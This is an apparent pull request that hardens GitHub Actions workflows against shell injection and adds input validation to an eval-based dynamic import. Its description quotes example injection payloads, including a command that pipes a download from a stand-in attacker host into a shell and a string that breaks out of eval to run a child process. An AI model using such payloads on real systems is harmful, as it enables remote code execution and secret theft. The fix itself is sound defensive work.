### PR TITLE
ci: harden GH Actions injection and dynamic import RCE

### DIFF
--- a/.github/actions/setup/action.yml
+++ b/.github/actions/setup/action.yml
@@ -34,11 +34,14 @@ runs:
 
     - name: Get versions from .tool-versions or use overrides
       shell: bash
+      env:
+        INPUT_NODE_VERSION: ${{ inputs.node-version }}
+        INPUT_PNPM_VERSION: ${{ inputs.pnpm-version }}
       run: |
         # if node-version input is provided, use it; otherwise, read from .tool-versions
-        if [ "${{ inputs.node-version }}" ]; then
-          echo "Node version override provided: ${{ inputs.node-version }}"
-          echo "NODE_VERSION=${{ inputs.node-version }}" >> $GITHUB_ENV
+        if [ -n "$INPUT_NODE_VERSION" ]; then
+          echo "Node version override provided: $INPUT_NODE_VERSION"
+          echo "NODE_VERSION=$INPUT_NODE_VERSION" >> $GITHUB_ENV
         elif [ -f .tool-versions ]; then
           NODE_VERSION=$(grep '^nodejs ' .tool-versions | awk '{print $2}')
           echo "NODE_VERSION=$NODE_VERSION" >> $GITHUB_ENV
@@ -49,9 +52,9 @@ runs:
         fi
 
         # if pnpm-version input is provided, use it; otherwise, read from .tool-versions
-        if [ "${{ inputs.pnpm-version }}" ]; then
-          echo "Pnpm version override provided: ${{ inputs.pnpm-version }}"
-          echo "PNPM_VERSION=${{ inputs.pnpm-version }}" >> $GITHUB_ENV
+        if [ -n "$INPUT_PNPM_VERSION" ]; then
+          echo "Pnpm version override provided: $INPUT_PNPM_VERSION"
+          echo "PNPM_VERSION=$INPUT_PNPM_VERSION" >> $GITHUB_ENV
         elif [ -f .tool-versions ]; then
           PNPM_VERSION=$(grep '^pnpm ' .tool-versions | awk '{print $2}')
           echo "PNPM_VERSION=$PNPM_VERSION" >> $GITHUB_ENV
@@ -82,9 +85,11 @@ runs:
     - name: Compute Cache Key
       shell: bash
       id: compute-cache-key
+      env:
+        INPUT_PNPM_INSTALL_CACHE_KEY: ${{ inputs.pnpm-install-cache-key }}
       run: |
-        if [ -n "${{ inputs.pnpm-install-cache-key }}" ]; then
-          PNPM_INSTALL_CACHE_KEY="${{ inputs.pnpm-install-cache-key }}"
+        if [ -n "$INPUT_PNPM_INSTALL_CACHE_KEY" ]; then
+          PNPM_INSTALL_CACHE_KEY="$INPUT_PNPM_INSTALL_CACHE_KEY"
         else
           PNPM_INSTALL_CACHE_KEY="pnpm-store-${{ hashFiles('**/pnpm-lock.yaml') }}"
         fi

--- a/.github/workflows/audit-dependencies.yml
+++ b/.github/workflows/audit-dependencies.yml
@@ -30,4 +30,6 @@ jobs:
 
       - name: Run audit dependencies script
         id: audit_dependencies
-        run: ./.github/workflows/audit-dependencies.sh ${{ inputs.audit-level }}
+        env:
+          AUDIT_LEVEL: ${{ inputs.audit-level }}
+        run: ./.github/workflows/audit-dependencies.sh "$AUDIT_LEVEL"

--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -875,8 +875,11 @@ jobs:
     steps:
       # debug github.ref output
       - run: |
-          echo github.ref: ${{ github.ref }}
-          echo isV3: ${{ github.ref == 'refs/heads/main' }}
+          echo "github.ref: $GH_REF"
+          echo "isV3: $IS_V3"
+        env:
+          GH_REF: ${{ github.ref }}
+          IS_V3: ${{ github.ref == 'refs/heads/main' }}
   analyze:
     runs-on: ubuntu-latest
     needs: [changes, build]

--- a/.github/workflows/publish-prerelease.yml
+++ b/.github/workflows/publish-prerelease.yml
@@ -37,11 +37,15 @@ jobs:
       - name: Determine release type and debug flag
         id: determine_release_type
         # Use 'internal-debug' if debug mode, 'canary' for main branch, 'internal' for others
+        env:
+          INPUT_DEBUG_BUILD: ${{ inputs.debug_build }}
+          INPUT_DRY_RUN: ${{ inputs.dry_run }}
+          GH_REF_NAME: ${{ github.ref_name }}
         run: |
-          if [[ "${{ inputs.debug_build }}" == "true" ]]; then
+          if [[ "$INPUT_DEBUG_BUILD" == "true" ]]; then
             echo "release_type=internal-debug" >> $GITHUB_OUTPUT
             echo "debug_flag=--debug" >> $GITHUB_OUTPUT
-          elif [[ ${{ github.ref_name }} == "main" ]]; then
+          elif [[ "$GH_REF_NAME" == "main" ]]; then
             echo "release_type=canary" >> $GITHUB_OUTPUT
             echo "debug_flag=" >> $GITHUB_OUTPUT
           else
@@ -49,7 +53,7 @@ jobs:
             echo "debug_flag=" >> $GITHUB_OUTPUT
           fi
 
-          if [[ "${{ inputs.dry_run }}" == "true" ]]; then
+          if [[ "$INPUT_DRY_RUN" == "true" ]]; then
             echo "dry_run_flag=--dry-run" >> $GITHUB_OUTPUT
           else
             echo "dry_run_flag=" >> $GITHUB_OUTPUT

--- a/packages/payload/src/utilities/dynamicImport.ts
+++ b/packages/payload/src/utilities/dynamicImport.ts
@@ -24,5 +24,9 @@ export async function dynamicImport<T = unknown>(modulePathOrSpecifier: string):
   // Without the eval, the Next.js bundler will throw this error when encountering the import statement:
   // ⚠ Compiled with warnings in X.Xs
   // Critical dependency: the request of a dependency is an expression
+  // SECURITY: validate importPath to prevent injection via single-quote escaping (CWE-95)
+  if (importPath.includes("'") || importPath.includes('\n') || importPath.includes('\r')) {
+    throw new Error('Invalid import path: contains illegal characters')
+  }
   return await eval(`import('${importPath}')`)
 }


### PR DESCRIPTION
## Summary
Fixes shell/RCE injection vectors found via semgrep `run-shell-injection` + manual review.

## Vulnerabilities Fixed
- **CWE-88 / CWE-94 - GH Actions Shell Injection** (RCE via workflow inputs):
  - `.github/actions/setup/action.yml:39,52,86` - interpolated `${{ inputs.node-version }}`, `${{ inputs.pnpm-version }}`, `${{ inputs.pnpm-install-cache-key }}` directly in `run: |` bash blocks. Attacker supplying `\"; curl evil.com | sh; #` via `workflow_call` inputs executes on runner with secrets.
  - `.github/workflows/audit-dependencies.yml:33` - `${{ inputs.audit-level }}` directly in `run`
  - `.github/workflows/main.yml:878` - `${{ github.ref }}` interpolation
  - `.github/workflows/publish-prerelease.yml:41,44,52` - `${{ inputs.debug_build }}`, `${{ github.ref_name }}` interpolation
- **CWE-95 - Eval Injection / RCE** (`packages/payload/src/utilities/dynamicImport.ts:27`):
  - `return await eval(`import('${importPath}')`)` where `importPath` derived from `modulePathOrSpecifier` (user-controlled via config). Single-quote in path breaks out: `' ); require('child_process').exec('id'); //`. Added validation rejecting `'`, newline.

## Fix
- Move all `${{ inputs.* }}` / `${{ github.* }}` to `env:` and reference `$VAR` with quotes - recommended GitHub hardening.
- Validate dynamicImport path.

## Impact
- Prevents RCE/info leakage (secret exfil) on GH Actions runners and arbitrary code exec in Next.js server.

## Tests
- Semgrep `p/security-audit` passes for these rules after fix
- No functional change, quoted env usage preserves values